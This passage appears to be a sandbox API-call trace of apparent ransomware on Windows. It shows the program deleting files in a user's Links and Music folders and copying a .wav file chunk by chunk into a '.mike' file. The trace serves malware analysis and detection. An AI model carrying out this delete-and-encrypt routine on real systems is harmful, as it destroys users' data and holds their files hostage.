lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.004] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0154.004] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0154.004] CoTaskMemFree (pv=0x508980) [0154.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.007] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0154.007] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0154.007] CoTaskMemFree (pv=0x508980) [0154.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.008] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0154.013] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", dwFileAttributes=0x80) returned 1 [0154.013] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", lpFilePart=0x0) returned 0x2f [0154.013] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk")) returned 1 [0154.014] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", lpFilePart=0x0) returned 0x2f [0154.015] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0154.021] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", dwFileAttributes=0x80) returned 1 [0154.021] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", lpFilePart=0x0) returned 0x31 [0154.021] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk")) returned 1 [0154.022] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", lpFilePart=0x0) returned 0x31 [0154.024] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0154.028] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", dwFileAttributes=0x80) returned 1 [0154.028] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", lpFilePart=0x0) returned 0x34 [0154.028] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk")) returned 1 [0154.029] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", lpFilePart=0x0) returned 0x34 [0154.031] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0154.031] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0154.031] CoTaskMemFree (pv=0x508980) [0154.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.032] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0154.032] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0154.032] CoTaskMemFree (pv=0x508980) [0154.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.033] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0154.038] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\a-1NVGTcqP.mp3", dwFileAttributes=0x80) returned 1 [0154.038] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\a-1NVGTcqP.mp3", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\a-1NVGTcqP.mp3", lpFilePart=0x0) returned 0x32 [0154.038] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\a-1NVGTcqP.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\a-1nvgtcqp.mp3")) returned 1 [0154.039] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\a-1NVGTcqP.mp3", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\a-1NVGTcqP.mp3", lpFilePart=0x0) returned 0x32 [0154.041] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0154.048] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\C-y2b5KOS.wav", dwFileAttributes=0x80) returned 1 [0154.048] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\C-y2b5KOS.wav", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\C-y2b5KOS.wav", lpFilePart=0x0) returned 0x31 [0154.048] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\C-y2b5KOS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\c-y2b5kos.wav")) returned 1 [0154.049] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\C-y2b5KOS.wav", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\C-y2b5KOS.wav", lpFilePart=0x0) returned 0x31 [0154.051] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0154.051] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0154.051] CoTaskMemFree (pv=0x508980) [0154.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.052] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0154.058] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\CgKuxUjNNbp_K_.mp3", dwFileAttributes=0x80) returned 1 [0154.059] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\CgKuxUjNNbp_K_.mp3", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\CgKuxUjNNbp_K_.mp3", lpFilePart=0x0) returned 0x47 [0154.059] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\CgKuxUjNNbp_K_.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\cgkuxujnnbp_k_.mp3")) returned 1 [0154.060] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\CgKuxUjNNbp_K_.mp3", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\CgKuxUjNNbp_K_.mp3", lpFilePart=0x0) returned 0x47 [0154.061] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0154.071] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\yqtrgk8Lt5N.wav", dwFileAttributes=0x80) returned 1 [0154.071] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\yqtrgk8Lt5N.wav", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\yqtrgk8Lt5N.wav", lpFilePart=0x0) returned 0x44 [0154.071] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\yqtrgk8Lt5N.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\yqtrgk8lt5n.wav")) returned 1 [0154.072] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\yqtrgk8Lt5N.wav", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\yqtrgk8Lt5N.wav", lpFilePart=0x0) returned 0x44 [0154.074] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0154.085] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\_x4z2.mp3", dwFileAttributes=0x80) returned 1 [0154.085] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\_x4z2.mp3", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\_x4z2.mp3", lpFilePart=0x0) returned 0x3e [0154.085] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\_x4z2.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\_x4z2.mp3")) returned 1 [0154.086] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\_x4z2.mp3", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\_x4z2.mp3", lpFilePart=0x0) returned 0x3e [0154.090] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0154.090] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0154.090] CoTaskMemFree (pv=0x508980) [0154.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.091] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0154.099] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\-XOYI1A1RnQ8J.mp3", dwFileAttributes=0x80) returned 1 [0154.099] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\-XOYI1A1RnQ8J.mp3", nBufferLength=0x105, lpBuffer=0x2aec98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\-XOYI1A1RnQ8J.mp3", lpFilePart=0x0) returned 0x4e [0154.099] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\-XOYI1A1RnQ8J.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\-xoyi1a1rnq8j.mp3")) returned 1 [0154.101] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\-XOYI1A1RnQ8J.mp3", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\-XOYI1A1RnQ8J.mp3", lpFilePart=0x0) returned 0x4e [0154.102] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0154.109] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\Caj2AdGH.mp3", dwFileAttributes=0x80) returned 1 [0154.109] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\Caj2AdGH.mp3", nBufferLength=0x105, lpBuffer=0x2aec98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\Caj2AdGH.mp3", lpFilePart=0x0) returned 0x49 [0154.109] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\Caj2AdGH.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\caj2adgh.mp3")) returned 1 [0154.110] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\Caj2AdGH.mp3", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\Caj2AdGH.mp3", lpFilePart=0x0) returned 0x49 [0154.112] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0154.319] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike", lpFilePart=0x0) returned 0x59 [0154.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0154.321] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\d1ejph8qxay6t7 2mjs.wav.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.321] GetFileType (hFile=0x1c8) returned 0x1 [0154.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0154.321] GetFileType (hFile=0x1c8) returned 0x1 [0154.321] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a20 [0154.322] WriteFile (in: hFile=0x1c8, lpBuffer=0x2106a8c*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2106a8c*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0154.322] CloseHandle (hObject=0x1c8) returned 1 [0154.322] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav", lpFilePart=0x0) returned 0x54 [0154.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0154.322] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\d1ejph8qxay6t7 2mjs.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.322] GetFileType (hFile=0x1c8) returned 0x1 [0154.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0154.322] GetFileType (hFile=0x1c8) returned 0x1 [0154.323] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0154.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x210954c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x210954c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0154.323] CloseHandle (hObject=0x1c8) returned 1 [0154.323] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike", lpFilePart=0x0) returned 0x59 [0154.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0154.323] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\d1ejph8qxay6t7 2mjs.wav.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.324] GetFileType (hFile=0x1c8) returned 0x1 [0154.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0154.324] GetFileType (hFile=0x1c8) returned 0x1 [0154.324] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x5220 [0154.324] WriteFile (in: hFile=0x1c8, lpBuffer=0x2113ab4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2113ab4*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0154.324] CloseHandle (hObject=0x1c8) returned 1 [0154.324] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav", lpFilePart=0x0) returned 0x54 [0154.324] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0154.324] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\d1ejph8qxay6t7 2mjs.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.324] GetFileType (hFile=0x1c8) returned 0x1 [0154.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0154.324] GetFileType (hFile=0x1c8) returned 0x1 [0154.325] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x7800 [0154.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x2116574, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2116574*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0154.325] CloseHandle (hObject=0x1c8) returned 1 [0154.325] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike", lpFilePart=0x0) returned 0x59 [0154.325] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0154.325] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\d1ejph8qxay6t7 2mjs.wav.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.325] GetFileType (hFile=0x1c8) returned 0x1 [0154.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0154.326] GetFileType (hFile=0x1c8) returned 0x1 [0154.326] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x7a20 [0154.326] WriteFile (in: hFile=0x1c8, lpBuffer=0x2120adc*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2120adc*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0154.326] CloseHandle (hObject=0x1c8) returned 1 [0154.326] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\D1ejPh8qXaY6t7 2MJS.wav", lpFilePart=0x0) returned 0x54 [0154.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0154.326] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 